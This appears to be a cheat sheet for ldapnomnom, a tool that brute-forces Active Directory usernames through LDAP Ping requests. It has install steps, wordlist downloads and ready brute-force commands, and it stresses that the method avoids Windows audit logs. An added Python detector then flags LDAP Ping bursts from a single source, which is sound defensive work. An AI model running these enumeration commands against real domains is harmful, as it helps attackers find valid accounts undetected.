Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP). Looks for enabled normal user accounts.
- LDAP Ping (Microsoft)
- LDAP Nom Nom (GitHub)
No Windows audit logs are generated. High speed: up to ~10K/sec, and beyond 25K/sec with multiple servers.
Installation
sudo apt update
sudo apt install golang
go install github.com/lkarlslund/ldapnomnom@latest
Help
~/go/bin/ldapnomnom -h
ldapnomnom [--server dc1.domain.suffix[,dc2.domain.suffix] | --dnsdomain domain.suffix] [--port number] [--tlsmode notls|tls|starttls] [--input filename] [--output filename [--progressbar]] [--parallel number-of-connections] [--maxservers number-of-servers] [--maxstrategy fastest|random] [--throttle n] [--maxrequests n]
Bruteforce AD usernames
Download wordlists of usernames
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/Names/names.txt
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames.txt
wget https://raw.githubusercontent.com/lisandre-com/Wordlists/main/xato-net-10-million-usernames-10000.txt
Bruteforce
~/go/bin/ldapnomnom --server dc01.example.com --dnsdomain example.com --input names.txt
~/go/bin/ldapnomnom --input xato-net-10-million-usernames-10000.txt --output nomnom-results.txt --server dc01.example.com --dnsdomain example.com --parallel 4
~/go/bin/ldapnomnom --input xato-net-10-million-usernames-10000.txt --output nomnom-results.txt --server dc01.example.com,dc02.example.com --dnsdomain example.com --parallel 16
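Detection

Since these requests generate no Windows audit logs, network telemetry is one place left to look. The following is an added example, not part of ldapnomnom or the original page: it flags sources that send LDAP Ping searches (Netlogon attribute, `User` clause in the filter) for many distinct usernames within a short window. The record format, sample values, and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample records in a hypothetical sensor export format:
# epoch-seconds, source IP, requested attribute, LDAP search filter.
SAMPLE = r"""
1700000000.10 10.0.7.8 Netlogon (&(DnsDomain=example.com)(User=WS042$)(NtVer=\06\00\00\00))
1700000001.00 10.0.5.23 Netlogon (&(NtVer=\06\00\00\00)(User=aaron))
1700000001.01 10.0.5.23 Netlogon (&(NtVer=\06\00\00\00)(User=abby))
1700000001.02 10.0.5.23 Netlogon (&(NtVer=\06\00\00\00)(User=adam))
1700000001.03 10.0.5.23 Netlogon (&(NtVer=\06\00\00\00)(User=adrian))
1700000001.04 10.0.5.23 Netlogon (&(NtVer=\06\00\00\00)(User=alan))
1700000001.05 10.0.5.23 Netlogon (&(NtVer=\06\00\00\00)(User=alex))
1700000003.50 10.0.9.9 cn (&(objectClass=user)(sAMAccountName=bob))
truncated-record
1700000300.00 10.0.7.8 Netlogon (&(DnsDomain=example.com)(User=WS042$)(NtVer=\06\00\00\00))
"""

USER_RE = re.compile(r"\(User=([^)]+)\)", re.IGNORECASE)

def ldap_pings(text):
    """Yield (ts, src, user) for Netlogon searches that carry a User clause."""
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4:
            continue  # skip blank or malformed records
        ts, src, attr, flt = parts
        match = USER_RE.search(flt)
        if attr.lower() == "netlogon" and match:
            yield float(ts), src, match.group(1).lower()

def detect(text, window=10.0, min_distinct=5):
    """Map each source to its largest count of distinct User values in one
    fixed window, keeping only sources at or above min_distinct."""
    buckets = defaultdict(set)
    for ts, src, user in ldap_pings(text):
        # Fixed buckets can split a burst across two windows; a sliding
        # window is stricter but longer to write.
        buckets[(src, int(ts // window))].add(user)
    hits = {}
    for (src, _), users in buckets.items():
        if len(users) >= min_distinct:
            hits[src] = max(hits.get(src, 0), len(users))
    return hits

if __name__ == "__main__":
    for src, count in detect(SAMPLE).items():
        print(f"{src}: {count} distinct usernames probed within one window")
```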